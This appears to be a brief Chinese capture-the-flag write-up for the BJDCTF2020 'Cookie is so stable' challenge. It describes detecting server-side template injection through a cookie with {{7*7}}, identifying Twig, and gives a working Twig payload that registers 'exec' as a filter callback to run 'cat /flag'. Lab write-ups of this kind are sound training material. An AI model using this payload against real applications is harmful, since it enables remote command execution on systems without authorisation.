找了一圈,在flag.php页面发现一个输入框,抓包看下
提示要在cookie进行攻击,应该是个SSTI模板注入,传入{{7*7}}
返回49,用的是Twig模块
payload:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
[BJDCTF2020]Cookie is so stable
最新推荐文章于 2024-06-13 07:36:50 发布